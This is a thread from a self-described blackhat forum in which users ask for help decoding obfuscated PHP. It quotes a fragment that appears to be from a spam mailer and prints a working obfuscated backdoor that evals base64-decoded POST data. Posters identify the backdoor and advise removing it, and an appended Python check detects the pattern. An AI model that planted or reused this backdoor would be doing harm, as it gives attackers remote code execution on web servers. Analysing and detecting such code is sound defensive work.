Best Blackhat Forum

Full Version: [REQ] Decode file PHP
Who can decode this PHP file?

File: http://www48.zippyshare.com/v/yT711hZj/file.html
This file is encrypted with YARRAK.
Who can decode this file?
Here is a sample of your file:
PHP Code:
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@error_reporting(NULL);
define("DNS_TYPE_MX", 0x000F);
define("DNS_TYPE_A", 0x0001);
define("DNS_TYPE_NS", 0x0002);
define("DNS_STEP_QESTION", 1);
define("DNS_STEP_ANSWER", 2);
define("DNS_STEP_AUTHORITY", 3);
define("DNS_STEP_ADDITIONAL", 4);
define("SOCKET_TYPE_SOCKET", 1);
define("SOCKET_TYPE_FSOCKET", 2);
define("SOCKET_TYPE_STREAM", 4);
define("SOCKET_TYPE_NO", 5);
define("SOCKET_PROTO_TCP", 1);
define("SOCKET_PROTO_UDP", 2);
define("STEP_CONNECT", 0);
define("STEP_CONNECTED", 1);
define("STEP_EHLO", 2);
define("STEP_MAILFROM", 3);
define("STEP_RCPTTO", 4);
define("STEP_DATA", 5);
define("STEP_BODY", 6);
define("STEP_QUIT", 7);
define("STEP_COMPLETED", 8);

sbrnc59($t60, NULL);
$ulkfl16 = array(
    "toList" => "",
    "fromLogin" => "",
    "fromName" => "",
    "subjTempl" => "",
    "bodyTempl" => "",
    "hostFrom" => ""
);

if (FALSE == yqffb44($t60, $ulkfl16)) {
    echo PHP_OS . '+' . md5(0987654321
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Please add reputation for me.

I need a full decode of this file. Can you help me?
(11-28-2015 05:09 AM) kolaz wrote: Here is a sample of your file:
PHP Code:
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@error_reporting(NULL);
define("DNS_TYPE_MX", 0x000F);
define("DNS_TYPE_A", 0x0001);
define("DNS_TYPE_NS", 0x0002);
define("DNS_STEP_QESTION", 1);
define("DNS_STEP_ANSWER", 2);
define("DNS_STEP_AUTHORITY", 3);
define("DNS_STEP_ADDITIONAL", 4);
define("SOCKET_TYPE_SOCKET", 1);
define("SOCKET_TYPE_FSOCKET", 2);
define("SOCKET_TYPE_STREAM", 4);
define("SOCKET_TYPE_NO", 5);
define("SOCKET_PROTO_TCP", 1);
define("SOCKET_PROTO_UDP", 2);
define("STEP_CONNECT", 0);
define("STEP_CONNECTED", 1);
define("STEP_EHLO", 2);
define("STEP_MAILFROM", 3);
define("STEP_RCPTTO", 4);
define("STEP_DATA", 5);
define("STEP_BODY", 6);
define("STEP_QUIT", 7);
define("STEP_COMPLETED", 8);

sbrnc59($t60, NULL);
$ulkfl16 = array(
    "toList" => "",
    "fromLogin" => "",
    "fromName" => "",
    "subjTempl" => "",
    "bodyTempl" => "",
    "hostFrom" => ""
);

if (FALSE == yqffb44($t60, $ulkfl16)) {
    echo PHP_OS . '+' . md5(0987654321
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Please add reputation for me.

Hmm, this file is hex encoded, just a simple method for decoding this file. You read the statement if (FALSE == yqffb44($t60, $ulkfl16)) {
echo PHP_OS . '+' . md5(0987654321) 43smoke
The new code was encoded. Who can decode it too?

PHP Code:
<?php
$cmtf46 = "a6dcbos_ep4t";
// Built from indexed characters of $cmtf46; resolves to "base64_decode"
$vmn5 = strtolower($cmtf46[4] . $cmtf46[0] . $cmtf46[6] . $cmtf46[8] . $cmtf46[1] . $cmtf46[10] . $cmtf46[7] . $cmtf46[2] . $cmtf46[8] . $cmtf46[3] . $cmtf46[5] . $cmtf46[2] . $cmtf46[8]);
// Resolves to "_POST"
$bfm5 = strtoupper($cmtf46[7] . $cmtf46[9] . $cmtf46[5] . $cmtf46[6] . $cmtf46[11]);
// Equivalent to: if (isset($_POST['na04af1'])) eval(base64_decode($_POST['na04af1']));
if (isset(${$bfm5}['na04af1'])) {
    eval($vmn5(${$bfm5}['na04af1']));
}
?>
Hi, this little script executes a script posted with the POST method.

If you have this script on your server, remove it...

It is an easy backdoor.
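
The pattern described in the last post, as an added example that is not from the thread: a Python static check that resolves function names rebuilt from indexed characters of a string literal and flags `eval` applied to a variable-function result, for use when sweeping a web root. The `SUSPICIOUS` list and the function names `resolve_names` and `findings` are assumptions made for illustration.

```python
import re

# Names worth flagging when a script rebuilds them at runtime (assumed short list).
SUSPICIOUS = {"base64_decode", "gzinflate", "str_rot13", "assert",
              "_post", "_get", "_request", "_cookie"}

ASSIGN_STR = re.compile(r'\$(\w+)\s*=\s*"([^"$\\]*)"\s*;')
ASSIGN_CALL = re.compile(r'\$(\w+)\s*=\s*(strtolower|strtoupper)\s*\(([^;]*)\)\s*;')
INDEX = re.compile(r'\$(\w+)\[(\d+)\]')


def resolve_names(php_source):
    """Statically rebuild strings assembled as $key[i] . $key[j] from a literal."""
    literals = dict(ASSIGN_STR.findall(php_source))
    resolved = {}
    for var, func, expr in ASSIGN_CALL.findall(php_source):
        parts = INDEX.findall(expr)
        # Handle only pure index concatenation; anything else is left unresolved.
        leftover = INDEX.sub("", expr).replace(".", "").strip()
        if not parts or leftover:
            continue
        try:
            text = "".join(literals[name][int(i)] for name, i in parts)
        except (KeyError, IndexError):
            continue
        resolved[var] = text.lower() if func == "strtolower" else text.upper()
    return resolved


def findings(php_source):
    """Return human-readable reasons to quarantine the file for review."""
    names = resolve_names(php_source)
    hits = sorted(f"${v} -> {s}" for v, s in names.items() if s.lower() in SUSPICIOUS)
    # eval() applied directly to the result of a variable function: eval($f(...))
    if re.search(r'\beval\s*\(\s*\$\w+\s*\(', php_source):
        hits.append("eval of variable-function result")
    return hits


# The snippet quoted in the thread, joined back onto single statements.
SAMPLE = r'''<?php
$cmtf46 = "a6dcbos_ep4t";
$vmn5 = strtolower($cmtf46[4] . $cmtf46[0] . $cmtf46[6] . $cmtf46[8] . $cmtf46[1] . $cmtf46[10] . $cmtf46[7] . $cmtf46[2] . $cmtf46[8] . $cmtf46[3] . $cmtf46[5] . $cmtf46[2] . $cmtf46[8]);
$bfm5 = strtoupper($cmtf46[7] . $cmtf46[9] . $cmtf46[5] . $cmtf46[6] . $cmtf46[11]);
if (isset(${$bfm5}['na04af1'])) { eval($vmn5(${$bfm5}['na04af1'])); }
?>'''

if __name__ == "__main__":
    print("\n".join(findings(SAMPLE)))
```

A file that produces any finding should be pulled for manual review rather than deleted automatically, since the check only covers this one index-concatenation style.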